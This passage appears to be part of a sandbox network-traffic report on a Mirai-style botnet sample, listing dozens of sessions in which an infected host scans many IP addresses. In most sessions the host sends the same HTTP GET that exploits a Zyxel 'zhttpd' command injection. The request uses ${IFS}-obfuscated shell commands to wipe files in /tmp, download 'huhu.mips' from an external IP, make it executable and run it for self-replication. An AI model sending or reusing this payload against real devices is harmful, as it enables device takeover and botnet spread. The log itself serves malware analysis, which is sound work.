                                              Jan 29, 2024 07:03:41.845354080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2434192.168.2.14484729.205.99.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845413923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2435192.168.2.143744448.56.122.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845443010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2436192.168.2.143565882.43.72.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845477104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2437192.168.2.1438182110.15.103.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845511913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2438192.168.2.1453872209.178.143.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845571995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2439192.168.2.1436910213.19.154.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845604897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2440192.168.2.14597302.201.43.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845638037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2441192.168.2.14439784.146.156.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845685005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2442192.168.2.143585048.153.227.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845712900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2443192.168.2.145409842.144.29.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845756054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2444192.168.2.144329699.5.168.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845804930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2445192.168.2.1454552187.231.79.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845834017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2446192.168.2.1443040129.88.58.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845863104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2447192.168.2.143498443.150.56.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845922947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2448192.168.2.145695840.179.78.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845947027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2449192.168.2.145722045.217.120.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845989943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2450192.168.2.1436166138.133.30.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846045971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2451192.168.2.1451274102.151.239.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846090078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2452192.168.2.1455762181.195.101.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846123934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2453192.168.2.1448644194.24.87.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846152067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2454192.168.2.1451300163.37.59.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846204042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2455192.168.2.1438276178.166.98.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846251011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2456192.168.2.145314050.53.30.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846272945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2457192.168.2.1457414162.26.135.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846319914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2458192.168.2.1435214209.226.77.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846329927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2459192.168.2.143897464.90.151.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846375942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2460192.168.2.1435598198.144.25.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846417904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2461192.168.2.143506254.205.0.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846468925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2462192.168.2.1450958145.182.58.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846512079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2463192.168.2.1439450116.45.242.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846540928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2464192.168.2.143758017.238.238.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846566916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2465192.168.2.144004483.81.214.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846617937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2466192.168.2.1442490223.206.23.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846637011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2467192.168.2.145307669.56.188.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846688986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2468192.168.2.144637457.235.1.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846745014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2469192.168.2.1450718178.180.182.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846774101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2470192.168.2.1459632207.187.132.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846800089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2471192.168.2.144492666.243.110.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846834898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2472192.168.2.1433234196.43.140.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846862078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2473192.168.2.143874412.218.211.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846908092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2474192.168.2.145676081.51.93.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846955061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2475192.168.2.1442298103.112.23.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.846990108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2476192.168.2.143538488.14.7.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847023964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2477192.168.2.145677220.29.207.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847063065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2478192.168.2.143356682.129.58.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847100973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2479192.168.2.1446256107.24.51.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847111940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2480192.168.2.145690212.113.215.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847182989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2481192.168.2.1433980138.230.87.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847228050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2482192.168.2.1460380155.98.33.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847264051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2483192.168.2.1447488113.229.113.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847287893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2484192.168.2.1454514163.163.144.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847310066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2485192.168.2.143435251.27.170.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847357988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2486192.168.2.1454088205.14.99.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847419024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2487192.168.2.144322235.162.217.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847444057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2488192.168.2.1443548152.239.18.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847477913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2489192.168.2.1434460121.115.29.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847510099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2490192.168.2.144367296.53.45.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847558975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2491192.168.2.144185080.116.78.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847594023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2492192.168.2.144283897.234.134.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847636938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2493192.168.2.1443466128.72.39.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847668886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2494192.168.2.145688449.125.26.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847727060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2495192.168.2.143727440.183.193.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847747087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2496192.168.2.145583865.248.194.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847789049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2497192.168.2.143662488.82.28.223443
                                              TimestampBytes transferredDirectionData
